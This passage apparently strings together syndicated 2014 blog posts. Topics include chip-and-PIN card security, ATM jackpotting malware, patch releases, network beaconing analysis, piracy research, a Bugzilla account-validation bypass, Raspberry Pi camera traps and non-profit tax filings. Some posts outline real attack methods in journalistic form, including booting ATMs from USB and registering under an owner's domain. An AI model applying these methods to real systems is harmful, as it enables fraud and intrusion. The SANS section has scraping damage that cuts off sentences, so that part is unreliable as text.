Conroy: The PIN only addresses fraud when the card is lost or stolen, and in the U.S. market lost-and-stolen fraud is very small in comparison with counterfeit card fraud. Also, as we looked at other geographies — and our research has substantiated this — as you see these geographies go chip-and-PIN, the lost-and-stolen fraud dips a little bit but then the criminals adjust. So in the UK, the lost-and-stolen fraud is now back above where was before the migration. The criminals there have adjusted. and that increased focus on capturing the PIN gives them more opportunity, because if they do figure out ways to compromise that PIN, then they can perpetrate ATM fraud and get more bang for their buck.

So, PIN at the end of the day is a static data element, and it only goes so far from a security perspective. And as you weigh that potential for attrition versus the potential to address the relatively small amount of fraud that is lost and stolen fraud, the business case for chip and signature is really a no-brainer.

Litan: Most card issuing banks and Visa don’t want PINs because the PINs can be stolen and used with the magnetic stripe data on the same cards (that also have a chip card) to withdraw cash from ATM machines. Banks eat the ATM fraud costs. This scenario has happened with the roll-out of chip cards with PIN – in Europe and in Canada.

BK: What are some of the things that have pushed more banks in the US toward chip-and-signature?

Conroy: As I talk to the networks and the issuers who have made their decision about where to go, there are a few things that are moving folks toward chip-and-signature. The first is that we are the most competitive market in the world, and so as you look at the business case for chip-and-signature versus chip-and-PIN, no issuer wants to have the card in the wallet that is the most difficult card to use.

BK: Are there recent examples that have spooked some of the banks away from embracing chip-and-PIN?

Conroy: There was a Canadian issuer that — when they did their migration to chip — really botched their chip-and-PIN roll out, and consumers were forgetting their PIN at the point-of-sale. That issuer saw a significant dip in transaction volume as a result. One of the missteps this issuer made was that they sent their PIN mailers out too soon before you could actually do PIN transactions at the point of sale, and consumers forgot. Also, at the time they sent out the cards, [the bank] didn’t have the capability at ATMs or IVRs (automated, phone-based customer service systems) for consumers to reset their PINs to something they could remember.

BK: But the United States has a much more complicated and competitive financial system, so wouldn’t you expect more issuers to be going with chip-and-PIN?

Conroy: With consumers having an average of about 3.3 cards in their wallet, and the US being a far more competitive card market, the issuers are very sensitive to that. As I was doing my chip-and-PIN research earlier this year, there was one issuer that said quite bluntly, “We don’t really think we can teach Americans to do two things at once. So we’re going to start with teaching them how to dip, and if we have another watershed event like the Target breach and consumers start clamoring for PIN, then we’ll adjust.” So the issuers I spoke with wanted to keep it simple: Go to market with plain vanilla, and once we get this working, we can evaluate adding some sprinkles and toppings later.

BK: What about the retailers? I would think more of them are in favor of chip-and-PIN over signature.

Litan: Retailers want PINs because they strengthen the security of the point-of-sale (POS) transaction and lessen the chances of fraud at the POS (which they would have to eat if they don’t have chip-accepting card readers but are presented with a chip card). Also retailers have traditionally been paying lower rates on PIN transactions as opposed to signature transactions, although those rates have more or less converged over time, I hear.

BK: Can you talk about the ability to use these signature cards outside the US? That’s been a sticking point in the past, no?

Conroy: The networks have actually done a good job over the last year to 18 months in pushing the [merchant banks] and terminal manufacturers to include “no cardholder verification method” as one of the options in the terminals. Which means that chip-and-signature cards are increasingly working. There was one issuer I spoke with that had issued chip-and-signature cards already for their traveling customers and they said that those moves by the networks and adjustments overseas meant that their chip-and-signature cards were working 98 percent of the time, even at the unattended kiosks, which were some of the things that were causing problems a lot of the time.

BK: Is there anything special about banks that have chosen to issue chip-and-PIN cards over chip-and-signature?

Conroy: Where were are seeing issuers go with chip-and-PIN, largely it is issuers where consumers have a very compelling reason to pull that particular card out of their wallet. So, we’re talking mostly about merchants who are issuing their own cards and have loyalty points for using that card at that store. That is where we don’t see folks worrying about the attrition risks so much, because they have another point of stickiness for that card.

BK: What did you think about the White House announcement that specifically called out chip-and-PIN as the chip standard the government is endorsing?

Conroy: The White House announcement I thought that was pure political window dressing. Especially when they claimed to be taking the lead on credit card security.  Visa, for example, made their initial road map announcement back in 2011. And [the White House is] coming to the table three years later thinking that its going to influence the direction the market is taking when many banks have spent in some cases upwards of a year coding toward these specifications? That just seems ludicrous to me. The chip-card train has been out of the station for a long time. And it seemed like political posturing at its best, or worst, depending on how you look at it.

Litan: I think it is very significant. It’s basically the White House taking the side of the card acceptors and what they prefer. Whatever the government does will definitely help drive trends, so I think it’s a big statement.

BK: So, I guess we should all be grateful that banks and retailers in the United States are finally taking steps to move toward chip cards, but it seems to me that as long as these chip cards still also store cardholder data on a magnetic stripe as a backup, that the thieves can still steal and counterfeit this card data — even from chip cards.

Litan: Yes, that’s the key problem for the next few years. Once mag stripe goes away, chip-and-PIN will be a very strong solution. The estimates are now that by the end of 2015, 50 percent of the cards and terminals will be chip-enabled, but it’s going to be several years before we get closer to full compliance. So, we’re probably about 2018 before we can start making plans to get rid of the magnetic stripe on these cards.

Krebs on Security: Spike in Malware Attacks on Aging ATMs

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

This author has long been fascinated with ATM skimmers, custom-made fraud devices designed to steal card data and PINs from unsuspecting users of compromised cash machines. But a recent spike in malicious software capable of infecting and jackpotting ATMs is shifting the focus away from innovative, high-tech skimming devices toward the rapidly aging ATM infrastructure in the United States and abroad.

Last month, media outlets in Malaysia reported that organized crime gangs had stolen the equivalent of about USD $1 million with the help of malware they’d installed on at least 18 ATMs across the country. Several stories about the Malaysian attack mention that the ATMs involved were all made by ATM giant NCR. To learn more about how these attacks are impacting banks and the ATM makers, I reached out to Owen Wild, NCR’s global marketing director, security compliance solutions.

Wild said ATM malware is here to stay and is on the rise.

ncrmalware

BK: I have to say that if I’m a thief, injecting malware to jackpot an ATM is pretty money. What do you make of reports that these ATM malware thieves in Malaysia were all knocking over NCR machines?

OW: The trend toward these new forms of software-based attacks is occurring industry-wide. It’s occurring on ATMs from every manufacturer, multiple model lines, and is not something that is endemic to NCR systems. In this particular situation for the [Malaysian] customer that was impacted, it happened to be an attack on a Persona series of NCR ATMs. These are older models. We introduced a new product line for new orders seven years ago, so the newest Persona is seven years old.

BK: How many of your customers are still using this older model?

OW: Probably about half the install base is still on Personas.

BK: Wow. So, what are some of the common trends or weaknesses that fraudsters are exploiting that let them plant malware on these machines? I read somewhere that the crooks were able to insert CDs and USB sticks in the ATMs to upload the malware, and they were able to do this by peeling off the top of the ATMs or by drilling into the facade in front of the ATM. CD-ROM and USB drive bays seem like extraordinarily insecure features to have available on any customer-accessible portions of an ATM.

OW: What we’re finding is these types of attacks are occurring on standalone, unattended types of units where there is much easier access to the top of the box than you would normally find in the wall-mounted or attended models.

BK: Unattended….meaning they’re not inside of a bank or part of a structure, but stand-alone systems off by themselves.

OW: Correct.

BK: It seems like the other big factor with ATM-based malware is that so many of these cash machines are still running Windows XP, no?

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

OW: Right now, that’s not a major factor. It is certainly something that has to be considered by ATM operators in making their migration move to newer systems. Microsoft discontinued updates and security patching on Windows XP, with very expensive exceptions. Where it becomes an issue for ATM operators is that maintaining Payment Card Industry (credit and debit card security standards) compliance requires that the ATM operator be running an operating system that receives ongoing security updates. So, while many ATM operators certainly have compliance issues, to this point we have not seen the operating system come into play.

BK: Really?

OW: Yes. If anything, the operating systems are being bypassed or manipulated with the software as a result of that.

BK: Wait a second. The media reports to date have observed that most of these ATM malware attacks were going after weaknesses in Windows XP?

OW: It goes deeper than that. Most of these attacks come down to two different ways of jackpotting the ATM. The first is what we call “black box” attacks, where some form of electronic device is hooked up to the ATM — basically bypassing the infrastructure in the processing of the ATM and sending an unauthorized cash dispense code to the ATM. That was the first wave of attacks we saw that started very slowly in 2012, went quiet for a while and then became active again in 2013.

The second type that we’re now seeing more of is attacks that start with the introduction of malware into the machine, and that kind of attack is a little less technical to get on the older machines if protective mechanisms aren’t in place.

BK: What sort of protective mechanisms, aside from physically securing the ATM?

OW: If you work on the configuration setting…for instance, if you lock down the BIOS of the ATM to eliminate its capability to boot from USB or CD drive, that gets you about as far as you can go. In high risk areas, these are the sorts of steps that can be taken to reduce risks.

BK: Seems like a challenge communicating this to your customers who aren’t anxious to spend a lot of money upgrading their ATM infrastructure.

OW: Most of these recommendations and requirements have to be considerate of the customer environment. We make sure we’ve given them the best guidance we can, but at end of the day our customers are going to decide how to approach this.

BK: You mentioned black-box attacks earlier. Is there one particular threat or weakness that makes this type of attack possible? One recent story on ATM malware suggested that the attackers may have been aided by the availability of ATM manuals online for certain older models.

OW: The ATM technology infrastructure is all designed on multivendor capability. You don’t have to be an ATM expert or have inside knowledge to generate or code malware for ATMs. Which is what makes the deployment of preventative measures so important. What we’re faced with as an industry is a combination of vulnerability on aging ATMs that were built and designed at a point where the threats and risk were not as great.

According to security firm F-Secure, the malware used in the Malaysian attacks was “PadPin,” a family of malicious software first identified by Symantec. Also, Russian antivirus firm Kaspersky has done some smashing research on a prevalent strain of ATM malware that it calls “Tyupkin.” Their write-up on it is here, and the video below shows the malware in action on a test ATM.

In a report published this month, the European ATM Security Team (EAST) said it tracked at least 20 incidents involving ATM jackpotting with malware in the first half of this year. “These were ‘cash out’ or ‘jackpotting’ attacks and all occurred on the same ATM type from a single ATM deployer in one country,” EAST Director Lachlan Gunn wrote. “While many ATM Malware attacks have been seen over the past few years in Russia, Ukraine and parts of Latin America, this is the first time that such attacks have been reported in Western Europe. This is a worrying new development for the industry in Europe”

Card skimming incidents fell by 21% compared to the same period in 2013, while overall ATM related fraud losses of €132 million (~USD $158 million) were reported, up 7 percent from the same time last year.

Krebs on Security: Microsoft, Adobe Push Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.

brokenwindowsEarlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is apparently present in every supported version of Windows. The New York Times carried a story today about the extent of the attacks against this flaw.

In its advisory on the zero-day vulnerability, Microsoft said the bug could allow remote code execution if a user opens a specially crafted malicious Microsoft Office document. According to iSight, the flaw was used in targeted email attacks that targeted NATO, Ukrainian and Western government organizations, and firms in the energy sector.

More than half of the other vulnerabilities fixed in this month’s patch batch address flaws in Internet Explorer. Additional details about the individual Microsoft patches released today is available at this link.

brokenflash-aSeparately, Adobe issued its usual round of updates for its Flash Player and AIR products. The patches plug at least three distinct security holes in these products. Adobe says it’s not aware of any active attacks against these vulnerabilities. Updates are available for Windows, Mac and Linux versions of Flash.

Adobe says users of the Adobe Flash Player desktop runtime for Windows and Macintosh should update to Adobe Flash Player 15.0.0.189. To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash, although my installation of Chrome says it is up-to-date and yet is still running v. 15.0.0.152 (with no outstanding updates available, and no word yet from Chrome about when the fix might be available).

The most recent versions of Flash are available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.). If you have Adobe AIR installed, you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15.0.0.293 for Windows, Mac, and Android.

Finally, Oracle is releasing an update for its Java software today that corrects more than two-dozen security flaws in the software. Oracle says 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. Java SE 8 updates are available here; the latest version of Java SE 7 is here.

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. Updates are available from Java.com or via the Java Control Panel. I don’t have an installation of Java handy on the machine I’m using to compose this post, but keep in mind that updating via the control panel may auto-select the installation of third-party software, so de-select that if you don’t want the added crapware.

javamessOtherwise, seriously consider removing Java altogether. I’ve long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

For Java power users — or for those who are having trouble upgrading or removing a stubborn older version — I recommend JavaRa, which can assist in repairing or removing Java when other methods fail (requires the Microsoft .NET Framework, which also received updates today from Microsoft).

SANS Internet Storm Center, InfoCON: green: CSAM: Be Wary of False Beacons, (Mon, Oct 13th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

[This is a guest diary published on behalf of Chris Sanders]

Hunting for evil in network traffic depends on the analysts ability to locate patterns and variances in oceans of data. This can be an overwhelming tasks and relies on fundamental knowledge of what is considered normal on your network as well as your experienced-based intuition. These dark waters are navigated by finding glimmers of light”>and following them where they lead you by carefully investigating all of the data sources and intelligence in your reach. While hunting the adversary in this manner can yield treasure, following some of these distant lights can also land you in the rocks.

One scenario that often puts analysts in murky waters occurs when they chase patterns of network traffic occurring over clearly visible intervals. This periodic activity often gets associated with beaconing, where analysts perceive the timing of the communication to mean that it may be the result of malicious code installed on a friendly system.

As an example, consider the flow records shown here:

” />
Figure 1 (click on image for full size)

If you look at the timestamps for each of these records, you will see that each communication sequence occurs almost exactly one minute from the previous. Along with this, the other characteristics of the communication appear to be similar. A consistent amount of data is being transferred from an internal host 172.16.16.137 to an external host 173.194.37.48 each time.

So, whats going on here? Less experienced analysts might jump to the conclusion that the friendly device is compromised and that it is beaconing back out to some sort of attacker controlled command and control infrastructure. In reality, it doesn” />
Figure 2 (click on image for full size)

As analysts, we are taught to identify patterns and hone in on those as potential signs of compromise. While this isnt an entirely faulty concept, it should also be used with discretion. With dynamic content so prevalent on the modern Internet, it is incredibly common to encounter scenarios where devices communicate in a periodic nature. This includes platforms such as web-based e-mail clients, social networking websites, chat clients, and more.

Ultimately, all network traffic is good unless you can prove its bad. If you do need to dig in further in scenarios like this, try to make the best use of your time by looking for information you can use to immediately eliminate the potential that the traffic is malicious. This might include some basic research about the potentially hostile host like we did here, immediately pivoting to full PCAP data to view the content of the traffic when possible, or by simply examining the friendly host to determine which process is responsible for the connection(s). The ability to be selective of what you choose to investigate and to quickly eliminate likely false positives is the sign of a mature analyst. The next time you are hunting through data looking for evil, be wary when your eyes are drawn towards beaconing”>Blogs:”>”>http://www.chrissanders.org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: NetNames Anti-Piracy Chief Moves to IFPI

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

price-imgNetNames is one of a number of brand protection businesses operating online today. The company, which aims to cushion the effects of fraud on its clients’ brands, positions itself as a global leader in the sector.

Established as Group NBT in 1995, the company was renamed NetNames in 2013 and shortly after grabbed dozens of headlines after publishing a major study into online piracy.

Commissioned by NBC Universal and titled ‘Sizing the Piracy Universe‘, the study mapped piracy volumes and prevalence around the world. NetNames’ found that piracy is both “tenacious and persistent”, with a penchant for consuming increasing amounts of Internet bandwidth every year.

The report was overseen by Dr David Price, then Director of Piracy and Counterfeit Analysis at NetNames. Price also presided over the publication last month of NetNames’ latest piracy study which focused on the role played by credit card companies in the cyberlocker space.

Published exactly a year after the NBC study, ‘Behind The Cyberlocker Door: A Report How Shadowy Cyberlockers Use Credit Card Companies to Make Millions‘ was commissioned by the Digital Citizens Alliance (DCA), ostensibly to protect consumers. DCA doesn’t openly reveal its sources of funding but the report has all the hallmarks of an entertainment industry-focused study.

Previously, Price was the chief of Piracy Intelligence at Envisional and the head of a study claiming to be the first to accurately estimate the amount of infringing traffic on the Internet.

Now it appears that Price’s work has received the ultimate compliment from one of the most powerful entertainment industry organizations on the planet.

ifpilogoThe International Federation of the Phonographic Industry, or IFPI as it’s more often called, is the umbrella anti-piracy organization for the world’s leading recording labels. As of now, IFPI – probably in their UK office since that’s where Price is based – has a new employee.

According to an amendment tucked away on his Linkedin profile, Price – who has a doctorate in Criminology from the University of Cambridge – is now working for the IFPI as their Head of Anti-Piracy Research and Analysis.

davidprice

In recent years Price has maintained a clear anti-piracy stance, which will obviously suit IFPI. He has participated in discussions calling for government action against piracy and regularly uses content-industry friendly terms such as “stealing” to describe unauthorized copying.

TorrentFreak contacted NetNames’ PR company for a comment on Price’s departure but at the time of publication we were yet to receive a response.

IFPI London, where the organization’s anti-piracy operations are based, also did not immediately respond to a request for comment.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Research Warns Against Overestimated Movie Piracy Losses

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

pixel-pirateWhen it comes to movie piracy Hollywood tends to be most concerned about unauthorized copies that appear online when a film is still paying in theaters.

These are often CAM releases, which are copies of the movie recorded in a theater. Despite their low quality, these CAMs are often downloaded hundreds of thousands if not millions of times.

To find out what effect these downloads have on box office revenues APAS Laboratory researcher Marc Milot conducted a thorough field study. By using download statistics from the torrent site Demonoid, in combination with movie ratings and pre-release buzz, the research estimates the effect of CAM piracy on box office sales.

The findings, published this week in a paper titled “Testing the lost sale concept in the context of unauthorized BitTorrent downloads of CAM copies of theatrical releases”, reveal an intriguing pattern.

Based on a sample of 32 widely released movies, the results show that box office revenue could be best predicted by pre-release buzz and to a lesser extent by the rating of the movies, which were both taken from Rotten Tomatoes. Interestingly, the amount of times a movie was pirated had no effect on its box office sales.

Instead of a link with sales, the amount of unauthorized downloads was affected by how visible these titles were on Demonoid. TorrentFreak contacted Milot, who believes that these results support the notion that many pirates download movies to discover new content.

“The research findings are the first to support with concrete behavioral evidence what BitTorrent file-sharers have been saying all along: that they don’t always download movies – in this case CAM versions of theatrical releases – they would have paid to view if they were not available on sites like Demonoid,” Milot told us.

This notion is supported by the fact that, unlike at the box office, the rating of a movie doesn’t affect the piracy volume. This finding is based on ratings by both Pirate Bay and Rotten Tomatoes users, to control for the possibility that pirates simply have a different movie taste.

Downloads/sales by movie rating
ratingdownloads

According to the researcher, these results should caution the movie industry not to overestimate the effect of CAM piracy on box office sales.

“BitTorrent site users appear to be exploring and downloading the most visible movies, without caring how good or bad they are. It is in this way that BitTorrent sites and the box office are completely different systems in which people behave uniquely and with different motivations,” Milot explains.

“These findings should caution against the use of download statistics alone in calculations of losses – in this case lost ticket sales – to avoid overestimation,” he adds.

Whether the above will be a reassurance for Hollywood has yet to be seen. There have been several studies on the impact of movie piracy in recent years, often with conflicting results. The current research helps to add yet another piece to the puzzle.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Bugzilla Zero-Day Exposes Zero-Day Bugs

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A previously unknown security flaw in Bugzilla — a popular online bug-tracking tool used by Mozilla and many of the open source Linux distributions — allows anyone to view detailed reports about unfixed vulnerabilities in a broad swath of software. Bugzilla is expected today to issue a fix for this very serious weakness, which potentially exposes a veritable gold mine of vulnerabilities that would be highly prized by cyber criminals and nation-state actors.

The Bugzilla mascot.

The Bugzilla mascot.

Multiple software projects use Bugzilla to keep track of bugs and flaws that are reported by users. The Bugzilla platform allows anyone to create an account that can be used to report glitches or security issues in those projects. But as it turns out, that same reporting mechanism can be abused to reveal sensitive information about as-yet unfixed security holes in software packages that rely on Bugzilla.

A developer or security researcher who wants to report a flaw in Mozilla Firefox, for example, can sign up for an account at Mozilla’s Bugzilla platform. Bugzilla responds automatically by sending a validation email to the address specified in the signup request. But recently, researchers at security firm Check Point Software Technologies discovered that it was possible to create Bugzilla user accounts that bypass that validation process.

“Our exploit allows us to bypass that and register using any email we want, even if we don’t have access to it, because there is no validation that you actually control that domain,” said Shahar Tal, vulnerability research team leader for Check Point. “Because of the way permissions work on Bugzilla, we can get administrative privileges by simply registering using an address from one of the domains of the Bugzilla installation owner. For example, we registered as admin@mozilla.org, and suddenly we could see every private bug under Firefox and everything else under Mozilla.”

Bugzilla is expected today to release updates to remove the vulnerability and help further secure its core product.

“An independent researcher has reported a vulnerability in Bugzilla which allows the manipulation of some database fields at the user creation procedure on Bugzilla, including the ‘login_name’ field,” said Sid Stamm, principal security and privacy engineer at Mozilla, which developed the tool and has licensed it for use under the Mozilla public license.

“This flaw allows an attacker to bypass email verification when they create an account, which may allow that account holder to assume some privileges, depending on how a particular Bugzilla instance is managed,” Stamm said. “There have been no reports from users that sensitive data has been compromised and we have no other reason to believe the vulnerability has been exploited. We expect the fixes to be released on Monday.”

The flaw is the latest in a string of critical and long-lived vulnerabilities to surface in the past year — including Heartbleed and Shellshock — that would be ripe for exploitation by nation state adversaries searching for secret ways to access huge volumes of sensitive data.

“The fact is that this was there for 10 years and no one saw it until now,” said Tal. “If nation state adversaries [had] access to private bug data, they would have a ball with this. There is no way to find out if anyone did exploit this other than going through user list and seeing if you have a suspicious user there.”

Like Heartbleed, this flaw was present in open source software to which countless developers and security experts had direct access for years on end.

“The perception that many eyes have looked at open source code and it’s secure because so many people have looked at it, I think this is false,” Tal said. “Because no one really audits code unless they’re committed to it or they’re paid to do it. This is why we can see such foolish bugs in very popular code.”

trackbugdawg

Raspberry Pi: A digital making community for wildlife: Naturebytes camera traps

This post was syndicated from: Raspberry Pi and was written by: Helen Lynn. Original post: at Raspberry Pi

Start-up Naturebytes hopes their 3D printed Raspberry Pi camera trap (a camera triggered by the presence of animals) will be the beginning of a very special community of makers.

Supported by the Raspberry Pi Foundation’s Education Fund and Nesta, Naturebytes aims to establish a digital making community for wildlife with a very important purpose. Their gadgets, creations and maker kits (and, hopefully, those of others who get involved) will be put to use collecting real data for conservation and wildlife research projects – and to kick it all off, they took their prototype 3D printed birdbox-style camera trap kit to family festival Camp Bestival to see what everyone thought.

NatureBytes camera trap prototype

If you were one of the lucky bunch to enjoy this year’s Camp Bestival, you’d have seen them over in the Science Tent with a colourful collection of their camera trap enclosures. The enclosure provides a snug home for a Raspberry Pi, Pi camera module, passive infrared sensor (PIR sensor), UBEC (a device used to regulate the power) and battery bank (they have plans to add external power capabilities, including solar, but for now they’re using eight trusty AA batteries to power the trap).

A colourful collection of camera trap enclosures

A colourful collection of camera trap enclosures

The PIR sensor does the job of detecting any wildlife passing by, and they’re using Python to control the camera module, which in turn snaps photos to the SD card. If you’re looking for nocturnal animals then the Pi NoIR could be used instead, with a bank of infrared LEDs to provide illumination.

Naturebytes says:

When you’re aiming to create maker kits for all manner of ages, it’s useful to try out your masterpiece with actual users to see how they found the challenge.

Naturebytes at Camp Bestival

Explaining how the camera trap enclosures are printed

Assembling camera traps at Camp Bestival

Camp Bestival festival-goers assembling camera traps

With screwdrivers at the ready, teams of festival-goers first took a look at one of our camera enclosures being printed on an Ultimaker before everyone sat down to assemble their own trap ready for a Blue Peter-style “Here’s one I made earlier” photo opportunity (we duct-taped a working camera trap to the back of a large TV so everyone could be captured in an image).

In fact, using the cam.start_preview() Python function we could output a few seconds of video when the PIR sensor was triggered, so everyone could watch.

One camera trap in action capturing another camera trap

Naturebytes duct-taped a working camera trap to the back of a large TV so everyone could see a camera trap in action

Our grand plan is to support the upcoming Naturebytes community of digital makers by accepting images from thousands of Naturebytes camera traps out in gardens, schools or wildlife reserves to the Naturebytes website, so we can share them with active conservation projects. We could, for example, be looking for hedgehogs to monitor their decline, and push the images you’ve taken of hedgehogs visiting your garden directly to wildlife groups on the ground who want the cold hard facts as to how many can be found in certain areas.

Job done, Camp Bestival!

Job done, Camp Bestival!

Keep your eyes peeled – Naturebytes is powering up for launch very soon!

TorrentFreak: Most Top Films Are Not Available on Netflix, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

netflix-logoThere is little doubt that, in the United States, Netflix has become the standard for watching movies on the Internet.

The subscription service is responsible for a third of all Internet traffic during peak hours, dwarfing that of online piracy and other legal video platforms.

It’s safe to assume that Netflix is the best and most convenient alternative to piracy at this point. That is, if the service carries the movies people want to see. This appears to be a problem.

Research firm KPMG has just released a new study that looks at the online availability of the 808 most popular and critically acclaimed films. The study was commissioned by NBC Universal and praised by the MPAA, presumably to dispel the argument that many people pirate because they don’t have the option to watch some films legally.

“This first-of-its-kind report analyzed the availability of 808 different film titles over 34 major online video distribution services and found that 94 percent of the films were available on at least one service,” MPAA’s Chris Dodd commented on the study.

The MPAA is right that most of the movies are available through online stores and rental services. However, the Hollywood group conveniently ignores the lacking availability on popular subscription platforms which services such as Netflix and Hulu use.

This is not a minor oversight as the study finds that availability of top films on Netflix and other subscription services is very low.

Although KPMG decided not to mention it in the executive summary of the report, the findings show that only 16% of the films are available through on-demand subscription services (SOVD).

Availability of the top films
topfilmavail

The above sheds a different light on the availability argument. Because, what good is it if 94 percent of the films are available online, but (at least) 84% are missing from the most-used movie service?

After all, most people prefer to get their movies in one place as it’s not very convenient to use a few dozen services to get your movie fix.

Of course this is not an excuse for people to go out and download films without permission, and we have to admit that a lot of progress has been made on the availability side in recent years. However, Hollywood can definitely learn from the music industry, where most of the popular content is available through subscription services.

From the availability point of view there’s another issue worth pointing out. The most pirated titles are usually recent releases, and these are generally not available, not even through iTunes, Amazon or rental services.

This is also illustrated in the KPMG report which shows that 100% of the top 2012 films are available online, compared to 77% of the 2013 releases. It’s probably safe to say that the majority of all pirated downloads are of films that are not yet legally available.

In other words, there’s still plenty of improvement possible.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Bradley M. Kuhn's Blog ( bkuhn ): IRS Tax-Exempt Status & FaiF 0x4E

This post was syndicated from: Bradley M. Kuhn's Blog ( bkuhn ) and was written by: Bradley M. Kuhn. Original post: at Bradley M. Kuhn's Blog ( bkuhn )

Historically, I used to write a blog post for each episode of the
audcast, Free as in Freedom that
Karen Sandler and I released. However, since I currently do my work on
FaiF exclusively as a
volunteer, I often found it difficult to budget time for a blog post about
each show.

However, enough happened in between when Karen and I
recorded FaiF 0x4E and
when it was released earlier this week that I thought I’d comment on those
events.

First, with regard to the direct content of the show, I’ve added
some detail in the 0x4E
show notes
about additional research I did about various other
non-software-related non-profit organizations that I mention in the
show.

The primary thrust of Karen’s and my discussion on the show, though,
regarded how the IRS is (somewhat strangely) the regulatory body for
various types of organizational statuses, and that our legislation lumps
many disparate activities together under the term “non-profit
organizations” in the USA.
The types of
these available
, outlined
in 26
USC§501(c)
, vary greatly in what they do, and in what the IRS
intends for them to do.

Interestingly, a few events occurred in mainstream popular culture since
FaiF 0x4E’s recording that relate to this subject. First, on John
Oliver’s Last
Week Tonight
Episode 18 on 2014-09-21 (skip to 08:30 in the video to
see the part I’m commenting on)
, John actually pulled out a stack of
interlocking Form 990s from various related non-profit organizations and
walked through some details of misrepresentation to the public regarding
the organization’s grant-making activities. As an avid reader of Form
990s, I was absolutely elated to see a popular comic pundit actually assign
his staff the task of reviewing Form 990s to follow the
money
. (Although I wish he hadn’t wasted the paper to print them out
merely to make a sight gag.)

Meanwhile, the failure of just about everyone to engage in such research
remains my constant frustration. I’m often amazed that people judge
non-profit organizations merely based on
a (Stephen-Colbert-style)
gut reaction
of truthiness rather
than researching the budgetary actions of such organizations. Given that
tendency, the mandatory IRS public disclosures for all these various
non-profits end up almost completely hidden in plain sight.

Granted, you sometimes have to make as many as three
clicks
, and type the name of the
organization twice
on Foundation
Center’s Form 990 finder
to find these documents. That’s why I started
to maintain the

FLOSS Foundation gitorious repository of Form 990s of all the orgs related
to Open Source and Free Software
— hoping that a git
clone
able solution would be more appealing to geeks. Yet, it’s rare
that anyone besides those of us who maintain the repository read these.
The only notable exception
is Brian
Proffitt’s interesting article back in March 2012, which made use of FLOSS
Foundation Form 990 data
. But, AFAIK, that’s the only time the media
has looked at any FLOSS Foundations’ Form 990s.

The final recent story related to non-profits
was linked
to by Conservancy Board of Directors member, Mike Linksvayer on
identi.ca
. In
the article
from Slate Mike references there
, Jordan Weissmann
points out that the
NFL is a 501(c)(6).
Weissmann further notes that permission for football to be classified
under 501(c)(6) rules seems like pork barrel politics in the first
place.

These disparate events — the Tea Party attacks against IRS 501(c)(4)
denials, John Oliver’s discussion of the Miss America Organization,
Weissmann’s specific angle in reporting the NFL scandals, and (more
parochially) Yorba’s 501(c)(3) and OpenStack Foundation’s 501(c)(6)
application denials — are brief moments of attention on non-profit
structures in the USA. In such moments, we’re invited to dig deeper and
understand what is really going on, using public information that’s readily
accessible. So, why do so many people use truthiness rather than data to
judge the performance and behavior of non-profit organizations? Why do so
many funders, grant-makers and donors admit to never even reading the Form
990 of the organizations whom they support and with whom they collaborate?
I ask, of course, rhetorically, but I’d be delighted if there is any answer
beyond: “because they’re lazy”.

The Hacker Factor Blog: Works Like a Charm

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As a software developer, one of my core philosophies is to automate common tasks. If you have to do something more than once, then it is better to automate it.

Of course, there always is that trade-off between the time to automate and the time saved. If a two-minute task takes 20 hours to automate, then it’s probably faster (and a better use of your time) to do it manually when needed. However, if you need to do it hundreds of times, then it’s better to spend 20 hours automating it.

Sometimes you may not even realize how often you do a task. All of those minutes may not seem like much, but they can really add up.

Work Harder, Not Smarter

FotoForensics is currently receiving over 1,000 unique pictures per day. We’re at the point where we can either (A) hire more administrators, or (B) simplify existing administrative duties.

